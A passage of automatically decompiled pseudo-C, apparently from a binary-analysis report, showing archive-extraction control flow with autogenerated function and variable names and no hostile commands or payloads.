                                                                            															 *_t108 =  *(_t706 + 0xf) & (_t404 & 0xffffff00 |  *((char*)(_t404 + 0x6153)) != 0x00000000) - 0x00000001;
                                                                            															__eflags =  *_t108;
                                                                            															L61:
                                                                            															_t110 = _t706 - 0x113c; // -2364
                                                                            															_t408 = E00197BE2(_t110, _t574, _t110);
                                                                            															__eflags = _t408;
                                                                            															if(_t408 != 0) {
                                                                            																while(1) {
                                                                            																	__eflags =  *((char*)(_t574 + 0x331b));
                                                                            																	if( *((char*)(_t574 + 0x331b)) == 0) {
                                                                            																		goto L65;
                                                                            																	}
                                                                            																	_t115 = _t706 - 0x113c; // -2364
                                                                            																	_t541 = E0019807D(_t683, _t574);
                                                                            																	__eflags = _t541;
                                                                            																	if(_t541 == 0) {
                                                                            																		 *((char*)(_t683 + 0x20f6)) = 1;
                                                                            																		goto L219;
                                                                            																	}
                                                                            																	L65:
                                                                            																	_t117 = _t706 - 0x13c; // 0x6c4
                                                                            																	_t592 = 0x40;
                                                                            																	memcpy(_t117,  *(_t683 + 8) + 0x5024, _t592 << 2);
                                                                            																	_t710 = _t708 + 0xc;
                                                                            																	asm("movsw");
                                                                            																	_t120 = _t706 - 0x2c; // 0x7d4
                                                                            																	_t683 =  *((intOrPtr*)(_t706 - 0x20));
                                                                            																	 *(_t706 - 4) = 0;
                                                                            																	asm("sbb ecx, ecx");
                                                                            																	_t127 = _t706 - 0x13c; // 0x6c4
                                                                            																	E0019C634(_t683 + 0x10, 0,  *((intOrPtr*)(_t574 + 0x331c)), _t127,  ~( *(_t574 + 0x3320) & 0x000000ff) & _t574 + 0x00003321, _t574 + 0x3331,  *((intOrPtr*)(_t574 + 0x336c)), _t574 + 0x334b, _t120);
                                                                            																	__eflags =  *((char*)(_t574 + 0x331b));
                                                                            																	if( *((char*)(_t574 + 0x331b)) == 0) {
                                                                            																		L73:
                                                                            																		 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                                                                            																		_t146 = _t706 - 0x13c; // 0x6c4
                                                                            																		L0019E724(_t146);
                                                                            																		_t147 = _t706 - 0x2160; // -6496
                                                                            																		E0019943C(_t147);
                                                                            																		_t418 =  *(_t574 + 0x3380);
                                                                            																		 *(_t706 - 4) = 1;
                                                                            																		 *(_t706 - 0x24) = _t418;
                                                                            																		_t670 = 0x50;
                                                                            																		__eflags = _t418;
                                                                            																		if(_t418 == 0) {
                                                                            																			L83:
                                                                            																			_t419 = E00192005(_t574);
                                                                            																			__eflags = _t419;
                                                                            																			if(_t419 == 0) {
                                                                            																				_t601 =  *(_t706 + 0xf);
                                                                            																				__eflags = _t601;
                                                                            																				if(_t601 == 0) {
                                                                            																					_t696 =  *(_t706 - 0x18);
                                                                            																					L96:
                                                                            																					__eflags =  *((char*)(_t574 + 0x6cb4));
                                                                            																					if( *((char*)(_t574 + 0x6cb4)) == 0) {
                                                                            																						__eflags = _t601;
                                                                            																						if(_t601 == 0) {
                                                                            																							L212:
                                                                            																							 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
                                                                            																							_t358 = _t706 - 0x2160; // -6496
                                                                            																							E0019946E(_t358);
                                                                            																							__eflags =  *(_t706 - 0x10);
                                                                            																							_t385 =  *(_t706 + 0xf);
                                                                            																							_t671 =  *(_t706 + 0xb);
                                                                            																							if( *(_t706 - 0x10) != 0) {
                                                                            																								_t362 = _t683 + 0xec;
                                                                            																								 *_t362 =  *(_t683 + 0xec) + 1;
                                                                            																								__eflags =  *_t362;
                                                                            																							}
                                                                            																							L214:
                                                                            																							__eflags =  *((char*)(_t683 + 0x60));
                                                                            																							if( *((char*)(_t683 + 0x60)) != 0) {
                                                                            																								goto L219;
                                                                            																							}
                                                                            																							__eflags = _t385;
                                                                            																							if(_t385 != 0) {
                                                                            																								L15:
                                                                            																								_t393 = 1;
                                                                            																								goto L16;
                                                                            																							}
                                                                            																							__eflags =  *((intOrPtr*)(_t574 + 0x6cb4)) - _t385;
                                                                            																							if( *((intOrPtr*)(_t574 + 0x6cb4)) != _t385) {
                                                                            																								__eflags = _t671;
                                                                            																								if(_t671 != 0) {
                                                                            																									goto L15;
                                                                            																								}
                                                                            																								goto L219;
                                                                            																							}
                                                                            																							L217:
                                                                            																							E00191E3B(_t574);
                                                                            																							goto L15;
                                                                            																						}
                                                                            																						L101:
                                                                            																						_t422 =  *(_t683 + 8);
                                                                            																						__eflags =  *((char*)(_t422 + 0x61f9));
                                                                            																						if( *((char*)(_t422 + 0x61f9)) == 0) {
                                                                            																							L103:
                                                                            																							_t423 =  *(_t706 + 0xb);
                                                                            																							__eflags = _t423;
                                                                            																							if(_t423 != 0) {
                                                                            																								L108:
                                                                            																								 *((char*)(_t706 - 0xf)) = 1;
                                                                            																								__eflags = _t423;
                                                                            																								if(_t423 != 0) {
                                                                            																									L110:
                                                                            																									 *((intOrPtr*)(_t683 + 0xe8)) =  *((intOrPtr*)(_t683 + 0xe8)) + 1;
                                                                            																									 *((intOrPtr*)(_t683 + 0x80)) = 0;
                                                                            																									 *((intOrPtr*)(_t683 + 0x84)) = 0;
                                                                            																									 *((intOrPtr*)(_t683 + 0x88)) = 0;
                                                                            																									 *((intOrPtr*)(_t683 + 0x8c)) = 0;
                                                                            																									E0019A728(_t683 + 0xc8, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
                                                                            																									E0019A728(_t683 + 0xa0, _t670,  *((intOrPtr*)(_t574 + 0x32f0)),  *((intOrPtr*)( *(_t683 + 8) + 0x82d8)));
                                                                            																									_t698 = _t683 + 0x10;
                                                                            																									 *(_t683 + 0x30) =  *(_t574 + 0x32d8);
                                                                            																									_t217 = _t706 - 0x2160; // -6496
                                                                            																									 *(_t683 + 0x34) =  *(_t574 + 0x32dc);
                                                                            																									E0019C67C(_t698, _t574, _t217);
                                                                            																									_t672 =  *((intOrPtr*)(_t706 - 0xf));
                                                                            																									_t608 = 0;
                                                                            																									_t432 =  *(_t706 + 0xb);
                                                                            																									 *((char*)(_t683 + 0x39)) = _t672;
                                                                            																									 *((char*)(_t683 + 0x3a)) = _t432;
                                                                            																									 *(_t706 - 0x1c) = 0;
                                                                            																									 *(_t706 - 0x28) = 0;
                                                                            																									__eflags = _t672;
                                                                            																									if(_t672 != 0) {
                                                                            																										L127:
                                                                            																										_t673 =  *(_t683 + 8);
                                                                            																										__eflags =  *((char*)(_t673 + 0x6198));
                                                                            																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
                                                                            																										__eflags =  *((char*)(_t706 - 0xf));
                                                                            																										if( *((char*)(_t706 - 0xf)) != 0) {
                                                                            																											L131:
                                                                            																											_t434 = 1;
                                                                            																											__eflags = 1;
                                                                            																											L132:
                                                                            																											__eflags =  *(_t706 - 0x24);
                                                                            																											 *((char*)(_t706 - 0xe)) = _t608;
                                                                            																											 *((char*)(_t706 - 0x12)) = _t434;
                                                                            																											 *((char*)(_t706 - 0xd)) = _t434;
                                                                            																											if( *(_t706 - 0x24) == 0) {
                                                                            																												__eflags =  *(_t574 + 0x3318);
                                                                            																												if( *(_t574 + 0x3318) == 0) {
                                                                            																													__eflags =  *((char*)(_t574 + 0x22a0));
                                                                            																													if(__eflags != 0) {
                                                                            																														E001A2842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
                                                                            																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
                                                                            																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
                                                                            																														__eflags = 0;
                                                                            																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
                                                                            																														 *((char*)(_t472 + 0x4c60)) = 0;
                                                                            																														E001A24D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
                                                                            																													} else {
                                                                            																														_push( *(_t574 + 0x32e4));
                                                                            																														_push( *(_t574 + 0x32e0));
                                                                            																														_push(_t698);
                                                                            																														E0019910B(_t574, _t673, _t683, __eflags);
                                                                            																													}
                                                                            																												}
                                                                            																												L163:
                                                                            																												E00191E3B(_t574);
                                                                            																												__eflags =  *((char*)(_t574 + 0x3319));
                                                                            																												if( *((char*)(_t574 + 0x3319)) != 0) {
                                                                            																													L166:
                                                                            																													_t436 = 0;
                                                                            																													__eflags = 0;
                                                                            																													_t610 = 0;
                                                                            																													L167:
                                                                            																													__eflags =  *(_t574 + 0x3370);
                                                                            																													if( *(_t574 + 0x3370) != 0) {
                                                                            																														__eflags =  *((char*)(_t574 + 0x22a0));
                                                                            																														if( *((char*)(_t574 + 0x22a0)) == 0) {
                                                                            																															L175:
                                                                            																															__eflags =  *(_t706 + 0xb);
                                                                            																															 *((char*)(_t706 - 0xe)) = _t436;
                                                                            																															if( *(_t706 + 0xb) != 0) {
                                                                            																																L185:
                                                                            																																__eflags =  *(_t706 - 0x24);
                                                                            																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
                                                                            																																if( *(_t706 - 0x24) == 0) {
                                                                            																																	L189:
                                                                            																																	_t611 = 0;
                                                                            																																	__eflags = 0;
                                                                            																																	L190:
                                                                            																																	__eflags =  *((char*)(_t706 - 0xf));
                                                                            																																	if( *((char*)(_t706 - 0xf)) != 0) {
                                                                            																																		goto L212;
                                                                            																																	}
                                                                            																																	_t699 =  *(_t706 - 0x18);
                                                                            																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
                                                                            																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
                                                                            																																		L193:
                                                                            																																		__eflags =  *(_t706 - 0x24);
                                                                            																																		if( *(_t706 - 0x24) == 0) {
                                                                            																																			L197:
                                                                            																																			__eflags = _t436;
                                                                            																																			if(_t436 == 0) {
                                                                            																																				L200:
                                                                            																																				__eflags = _t611;
                                                                            																																				if(_t611 != 0) {
                                                                            																																					L208:
                                                                            																																					_t437 =  *(_t683 + 8);
                                                                            																																					__eflags =  *((char*)(_t437 + 0x61a0));
                                                                            																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
                                                                            																																						_t700 = _t683 + 0x10f6;
                                                                            																																						_t438 = E0019A12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
                                                                            																																						__eflags = _t438;
                                                                            																																						if(__eflags == 0) {
                                                                            																																							E00196BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
                                                                            																																						}
                                                                            																																					}
                                                                            																																					 *(_t683 + 0x10f5) = 1;
                                                                            																																					goto L212;
                                                                            																																				}
                                                                            																																				_t675 =  *(_t706 - 0x28);
                                                                            																																				__eflags = _t675;
                                                                            																																				_t613 =  *(_t706 - 0x1c);
                                                                            																																				if(_t675 > 0) {
                                                                            																																					L203:
                                                                            																																					__eflags = _t436;
                                                                            																																					if(_t436 != 0) {
                                                                            																																						L206:
                                                                            																																						_t331 = _t706 - 0x2160; // -6496
                                                                            																																						E00199BD6(_t331);
                                                                            																																						L207:
                                                                            																																						_t688 = _t574 + 0x32c0;
                                                                            																																						asm("sbb eax, eax");
                                                                            																																						asm("sbb ecx, ecx");
                                                                            																																						asm("sbb eax, eax");
                                                                            																																						_t339 = _t706 - 0x2160; // -6496
                                                                            																																						E00199A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
                                                                            																																						_t340 = _t706 - 0x2160; // -6496
                                                                            																																						E001994DA(_t340);
                                                                            																																						E00197A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
                                                                            																																						asm("sbb eax, eax");
                                                                            																																						asm("sbb eax, eax");
                                                                            																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
                                                                            																																						E00199A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
                                                                            																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
                                                                            																																						goto L208;
                                                                            																																					}
                                                                            																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
                                                                            																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
                                                                            																																						goto L206;
                                                                            																																					}
                                                                            																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
                                                                            																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
                                                                            																																						goto L207;
                                                                            																																					}
                                                                            																																					goto L206;
                                                                            																																				}
                                                                            																																				__eflags = _t613;
                                                                            																																				if(_t613 == 0) {
                                                                            																																					goto L207;
                                                                            																																				}
                                                                            																																				goto L203;
                                                                            																																			}
                                                                            																																			_t460 =  *(_t683 + 8);
                                                                            																																			__eflags =  *((char*)(_t460 + 0x6198));
                                                                            																																			if( *((char*)(_t460 + 0x6198)) == 0) {
                                                                            																																				goto L212;
                                                                            																																			}
                                                                            																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
                                                                            																																			goto L200;
                                                                            																																		}
                                                                            																																		__eflags = _t611;
                                                                            																																		if(_t611 != 0) {
                                                                            																																			goto L197;
                                                                            																																		}
                                                                            																																		__eflags =  *(_t574 + 0x3380) - 5;
                                                                            																																		if( *(_t574 + 0x3380) != 5) {
                                                                            																																			goto L212;
                                                                            																																		}
                                                                            																																		__eflags = _t674;
                                                                            																																		if(_t674 == 0) {
                                                                            																																			goto L212;
                                                                            																																		}
                                                                            																																		goto L197;
                                                                            																																	}
                                                                            																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
                                                                            																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
                                                                            																																		goto L212;
                                                                            																																	}
                                                                            																																	goto L193;
                                                                            																																}
                                                                            																																__eflags =  *(_t574 + 0x3380) - 4;
                                                                            																																if( *(_t574 + 0x3380) != 4) {
                                                                            																																	goto L189;
                                                                            																																}
                                                                            																																__eflags = _t674;
                                                                            																																if(_t674 == 0) {
                                                                            																																	goto L189;
                                                                            																																}
                                                                            																																_t611 = 1;
                                                                            																																goto L190;
                                                                            																															}
                                                                            																															__eflags =  *((char*)(_t706 - 0x12));
                                                                            																															if( *((char*)(_t706 - 0x12)) == 0) {
                                                                            																																goto L185;
                                                                            																															}
                                                                            																															__eflags = _t610;
                                                                            																															if(_t610 != 0) {
                                                                            																																goto L185;
                                                                            																															}
                                                                            																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
                                                                            																															if(__eflags == 0) {
                                                                            																																L183:
                                                                            																																_t311 = _t706 - 0x113c; // -2364
                                                                            																																_push(_t574 + 0x1e);
                                                                            																																_push(3);
                                                                            																																L184:
                                                                            																																E00196BF5(__eflags);
                                                                            																																 *((char*)(_t706 - 0xe)) = 1;
                                                                            																																E00196E03(0x1d00e0, 3);
                                                                            																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
                                                                            																																goto L185;
                                                                            																															}
                                                                            																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
                                                                            																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
                                                                            																																L181:
                                                                            																																__eflags =  *((char*)(_t683 + 0xf3));
                                                                            																																if(__eflags != 0) {
                                                                            																																	goto L183;
                                                                            																																}
                                                                            																																_t309 = _t706 - 0x113c; // -2364
                                                                            																																_push(_t574 + 0x1e);
                                                                            																																_push(4);
                                                                            																																goto L184;
                                                                            																															}
                                                                            																															__eflags =  *(_t574 + 0x6cc4) - _t610;
                                                                            																															if(__eflags == 0) {
                                                                            																																goto L183;
                                                                            																															}
                                                                            																															goto L181;
                                                                            																														}
                                                                            																														__eflags =  *(_t574 + 0x32e4) - _t436;
                                                                            																														if(__eflags < 0) {
                                                                            																															goto L175;
                                                                            																														}
                                                                            																														if(__eflags > 0) {
                                                                            																															L173:
                                                                            																															__eflags = _t610;
                                                                            																															if(_t610 != 0) {
                                                                            																																 *((char*)(_t683 + 0xf3)) = 1;
                                                                            																															}
                                                                            																															goto L175;
                                                                            																														}
                                                                            																														__eflags =  *(_t574 + 0x32e0) - _t436;
                                                                            																														if( *(_t574 + 0x32e0) <= _t436) {
                                                                            																															goto L175;
                                                                            																														}
                                                                            																														goto L173;
                                                                            																													}
                                                                            																													 *((char*)(_t683 + 0xf3)) = _t436;
                                                                            																													goto L175;
                                                                            																												}
                                                                            																												asm("sbb edx, edx");
                                                                            																												_t469 = E0019A6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
                                                                            																												__eflags = _t469;
                                                                            																												if(_t469 == 0) {
                                                                            																													goto L166;
                                                                            																												}
                                                                            																												_t610 = 1;
                                                                            																												_t436 = 0;
                                                                            																												goto L167;
                                                                            																											}
                                                                            																											_t702 =  *(_t574 + 0x3380);
                                                                            																											__eflags = _t702 - 4;
                                                                            																											if(__eflags == 0) {
                                                                            																												L146:
                                                                            																												_t262 = _t706 - 0x41a8; // -14760
                                                                            																												E001980B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
                                                                            																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
                                                                            																												__eflags = _t608;
                                                                            																												if(_t608 == 0) {
                                                                            																													L153:
                                                                            																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
                                                                            																													L154:
                                                                            																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
                                                                            																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
                                                                            																														L141:
                                                                            																														__eflags = _t608;
                                                                            																														if(_t608 == 0) {
                                                                            																															L157:
                                                                            																															_t480 = 0;
                                                                            																															__eflags = 0;
                                                                            																															L158:
                                                                            																															 *(_t683 + 0x10f5) = _t480;
                                                                            																															goto L163;
                                                                            																														}
                                                                            																														L142:
                                                                            																														__eflags = _t479;
                                                                            																														if(_t479 == 0) {
                                                                            																															goto L157;
                                                                            																														}
                                                                            																														_t480 = 1;
                                                                            																														goto L158;
                                                                            																													}
                                                                            																													__eflags = _t608;
                                                                            																													if(_t608 != 0) {
                                                                            																														goto L142;
                                                                            																													}
                                                                            																													L140:
                                                                            																													 *((char*)(_t706 - 0x12)) = 0;
                                                                            																													goto L141;
                                                                            																												}
                                                                            																												__eflags =  *((short*)(_t706 - 0x41a8));
                                                                            																												if( *((short*)(_t706 - 0x41a8)) == 0) {
                                                                            																													goto L153;
                                                                            																												}
                                                                            																												_t266 = _t706 - 0x41a8; // -14760
                                                                            																												_push(0x800);
                                                                            																												_push(_t683 + 0x10f6);
                                                                            																												__eflags = _t702 - 4;
                                                                            																												if(__eflags != 0) {
                                                                            																													_push(_t574 + 0x1e);
                                                                            																													_t269 = _t706 - 0x2160; // -6496
                                                                            																													_t479 = E00199049(_t673, __eflags);
                                                                            																												} else {
                                                                            																													_t479 = E001974DD(_t608, __eflags);
                                                                            																												}
                                                                            																												L151:
                                                                            																												 *((char*)(_t706 - 0xd)) = _t479;
                                                                            																												__eflags = _t479;
                                                                            																												if(_t479 == 0) {
                                                                            																													L139:
                                                                            																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
                                                                            																													goto L140;
                                                                            																												}
                                                                            																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
                                                                            																												goto L154;
                                                                            																											}
                                                                            																											__eflags = _t702 - 5;
                                                                            																											if(__eflags == 0) {
                                                                            																												goto L146;
                                                                            																											}
                                                                            																											__eflags = _t702 - _t434;
                                                                            																											if(_t702 == _t434) {
                                                                            																												L144:
                                                                            																												__eflags = _t608;
                                                                            																												if(_t608 == 0) {
                                                                            																													goto L153;
                                                                            																												}
                                                                            																												_push(_t683 + 0x10f6);
                                                                            																												_t479 = E0019774C(_t673, _t683 + 0x10, _t574);
                                                                            																												goto L151;
                                                                            																											}
                                                                            																											__eflags = _t702 - 2;
                                                                            																											if(_t702 == 2) {
                                                                            																												goto L144;
                                                                            																											}
                                                                            																											__eflags = _t702 - 3;
                                                                            																											if(__eflags == 0) {
                                                                            																												goto L144;
                                                                            																											}
                                                                            																											E00196BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
                                                                            																											__eflags = 0;
                                                                            																											_t479 = 0;
                                                                            																											 *((char*)(_t706 - 0xd)) = 0;
                                                                            																											goto L139;
                                                                            																										}
                                                                            																										__eflags = _t432;
                                                                            																										if(_t432 != 0) {
                                                                            																											goto L131;
                                                                            																										}
                                                                            																										_t491 = 0x50;
                                                                            																										__eflags =  *(_t706 - 0x18) - _t491;
                                                                            																										if( *(_t706 - 0x18) == _t491) {
                                                                            																											goto L131;
                                                                            																										}
                                                                            																										_t434 = 1;
                                                                            																										_t608 = 1;
                                                                            																										goto L132;
                                                                            																									}
                                                                            																									__eflags =  *(_t574 + 0x6cc4);
                                                                            																									if( *(_t574 + 0x6cc4) != 0) {
                                                                            																										goto L127;
                                                                            																									}
                                                                            																									_t703 =  *(_t574 + 0x32e4);
                                                                            																									_t681 =  *(_t574 + 0x32e0);
                                                                            																									__eflags = _t703;
                                                                            																									if(__eflags < 0) {
                                                                            																										L126:
                                                                            																										_t698 = _t683 + 0x10;
                                                                            																										goto L127;
                                                                            																									}
                                                                            																									if(__eflags > 0) {
                                                                            																										L115:
                                                                            																										_t631 =  *(_t574 + 0x32d8);
                                                                            																										_t632 = _t631 << 0xa;
                                                                            																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
                                                                            																										if(__eflags < 0) {
                                                                            																											L125:
                                                                            																											_t432 =  *(_t706 + 0xb);
                                                                            																											_t608 = 0;
                                                                            																											__eflags = 0;
                                                                            																											goto L126;
                                                                            																										}
                                                                            																										if(__eflags > 0) {
                                                                            																											L118:
                                                                            																											__eflags = _t703;
                                                                            																											if(__eflags < 0) {
                                                                            																												L124:
                                                                            																												_t237 = _t706 - 0x2160; // -6496
                                                                            																												E001998D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
                                                                            																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
                                                                            																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
                                                                            																												goto L125;
                                                                            																											}
                                                                            																											if(__eflags > 0) {
                                                                            																												L121:
                                                                            																												_t499 = E001996E1(_t681);
                                                                            																												__eflags = _t681 -  *(_t574 + 0x32dc);
                                                                            																												if(__eflags < 0) {
                                                                            																													goto L125;
                                                                            																												}
                                                                            																												if(__eflags > 0) {
                                                                            																													goto L124;
                                                                            																												}
                                                                            																												__eflags = _t499 -  *(_t574 + 0x32d8);
                                                                            																												if(_t499 <=  *(_t574 + 0x32d8)) {
                                                                            																													goto L125;
                                                                            																												}
                                                                            																												goto L124;
                                                                            																											}
                                                                            																											__eflags = _t681 - 0x5f5e100;
                                                                            																											if(_t681 < 0x5f5e100) {
                                                                            																												goto L124;
                                                                            																											}
                                                                            																											goto L121;
                                                                            																										}
                                                                            																										__eflags = _t632 - _t681;
                                                                            																										if(_t632 <= _t681) {
                                                                            																											goto L125;
                                                                            																										}
                                                                            																										goto L118;
                                                                            																									}
                                                                            																									__eflags = _t681 - 0xf4240;
                                                                            																									if(_t681 <= 0xf4240) {
                                                                            																										goto L126;
                                                                            																									}
                                                                            																									goto L115;
                                                                            																								}
                                                                            																								L109:
                                                                            																								_t198 = _t683 + 0xe4;
                                                                            																								 *_t198 =  *(_t683 + 0xe4) + 1;
                                                                            																								__eflags =  *_t198;
                                                                            																								goto L110;
                                                                            																							}
                                                                            																							 *((char*)(_t706 - 0xf)) = 0;
                                                                            																							_t501 = 0x50;
                                                                            																							__eflags = _t696 - _t501;
                                                                            																							if(_t696 != _t501) {
                                                                            																								_t192 = _t706 - 0x2160; // -6496
                                                                            																								__eflags = E00199745(_t192);
                                                                            																								if(__eflags != 0) {
                                                                            																									E00196BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
                                                                            																									E00196E9B(0x1d00e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
                                                                            																								}
                                                                            																							}
                                                                            																							goto L109;
                                                                            																						}
                                                                            																						 *(_t683 + 0x10f5) = 1;
                                                                            																						__eflags =  *((char*)(_t422 + 0x61f9));
                                                                            																						if( *((char*)(_t422 + 0x61f9)) != 0) {
                                                                            																							_t423 =  *(_t706 + 0xb);
                                                                            																							goto L108;
                                                                            																						}
                                                                            																						goto L103;
                                                                            																					}
                                                                            																					 *(_t706 + 0xb) = 1;
                                                                            																					 *(_t706 + 0xf) = 1;
                                                                            																					_t182 = _t706 - 0x113c; // -2364
                                                                            																					_t511 = E001A0FD9(_t601, _t182, 0, 0, 1);
                                                                            																					__eflags = _t511;
                                                                            																					if(_t511 != 0) {
                                                                            																						goto L101;
                                                                            																					}
                                                                            																					__eflags = 0;
                                                                            																					 *(_t706 - 0x1c) = 0;
                                                                            																					L99:
                                                                            																					_t184 = _t706 - 0x2160; // -6496
                                                                            																					E0019946E(_t184);
                                                                            																					_t393 =  *(_t706 - 0x1c);
                                                                            																					goto L16;
                                                                            																				}
                                                                            																				_t174 = _t706 - 0x2160; // -6496
                                                                            																				_push(_t574);
                                                                            																				_t515 = E00197F5F(_t683);
                                                                            																				_t696 =  *(_t706 - 0x18);
                                                                            																				_t601 = _t515;
                                                                            																				 *(_t706 + 0xf) = _t601;
                                                                            																				L93:
                                                                            																				__eflags = _t601;
                                                                            																				if(_t601 != 0) {
                                                                            																					goto L101;
                                                                            																				}
                                                                            																				goto L96;
                                                                            																			}
                                                                            																			__eflags =  *(_t706 + 0xf);
                                                                            																			if( *(_t706 + 0xf) != 0) {
                                                                            																				_t516 =  *(_t706 - 0x18);
                                                                            																				__eflags = _t516 - 0x50;
                                                                            																				if(_t516 != 0x50) {
                                                                            																					_t639 = 0x49;
                                                                            																					__eflags = _t516 - _t639;
                                                                            																					if(_t516 != _t639) {
                                                                            																						_t640 = 0x45;
                                                                            																						__eflags = _t516 - _t640;
                                                                            																						if(_t516 != _t640) {
                                                                            																							_t517 =  *(_t683 + 8);
                                                                            																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
                                                                            																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
                                                                            																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
                                                                            																								_t172 = _t706 - 0x113c; // -2364
                                                                            																								_push(_t574);
                                                                            																								E00197D9B(_t683);
                                                                            																							}
                                                                            																						}
                                                                            																					}
                                                                            																				}
                                                                            																			}
                                                                            																			goto L99;
                                                                            																		}
                                                                            																		__eflags = _t418 - 5;
                                                                            																		if(_t418 == 5) {
                                                                            																			goto L83;
                                                                            																		}
                                                                            																		_t601 =  *(_t706 + 0xf);
                                                                            																		_t696 =  *(_t706 - 0x18);
                                                                            																		__eflags = _t601;
                                                                            																		if(_t601 == 0) {
                                                                            																			goto L96;
                                                                            																		}
                                                                            																		__eflags = _t696 - _t670;
                                                                            																		if(_t696 == _t670) {
                                                                            																			goto L93;
                                                                            																		}
                                                                            																		_t520 =  *(_t683 + 8);
                                                                            																		__eflags =  *((char*)(_t520 + 0x61f9));
                                                                            																		if( *((char*)(_t520 + 0x61f9)) != 0) {
                                                                            																			goto L93;
                                                                            																		}
                                                                            																		 *((char*)(_t706 - 0xf)) = 0;
                                                                            																		_t523 = E00199E6B(_t683 + 0x10f6);
                                                                            																		__eflags = _t523;
                                                                            																		if(_t523 == 0) {
                                                                            																			L81:
                                                                            																			__eflags =  *((char*)(_t706 - 0xf));
                                                                            																			if( *((char*)(_t706 - 0xf)) == 0) {
                                                                            																				_t601 =  *(_t706 + 0xf);
                                                                            																				goto L93;
                                                                            																			}
                                                                            																			L82:
                                                                            																			_t601 = 0;
                                                                            																			 *(_t706 + 0xf) = 0;
                                                                            																			goto L93;
                                                                            																		}
                                                                            																		__eflags =  *((char*)(_t706 - 0xf));
                                                                            																		if( *((char*)(_t706 - 0xf)) != 0) {
                                                                            																			goto L82;
                                                                            																		}
                                                                            																		__eflags = 0;
                                                                            																		_push(0);
                                                                            																		_push(_t574 + 0x32c0);
                                                                            																		_t160 = _t706 - 0xf; // 0x7f1
                                                                            																		E0019919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
                                                                            																		goto L81;
                                                                            																	}
                                                                            																	__eflags =  *((char*)(_t574 + 0x3341));
                                                                            																	if( *((char*)(_t574 + 0x3341)) == 0) {
                                                                            																		goto L73;
                                                                            																	}
                                                                            																	_t132 = _t706 - 0x2c; // 0x7d4
                                                                            																	_t531 = E001AF3CA(_t574 + 0x3342, _t132, 8);
                                                                            																	_t708 = _t710 + 0xc;
                                                                            																	__eflags = _t531;
                                                                            																	if(_t531 == 0) {
                                                                            																		goto L73;
                                                                            																	}
                                                                            																	__eflags =  *(_t574 + 0x6cc4);
                                                                            																	if( *(_t574 + 0x6cc4) != 0) {
                                                                            																		goto L73;
                                                                            																	}
                                                                            																	__eflags =  *((char*)(_t683 + 0x10f4));
                                                                            																	_t136 = _t706 - 0x113c; // -2364
                                                                            																	_push(_t574 + 0x1e);
                                                                            																	if(__eflags != 0) {
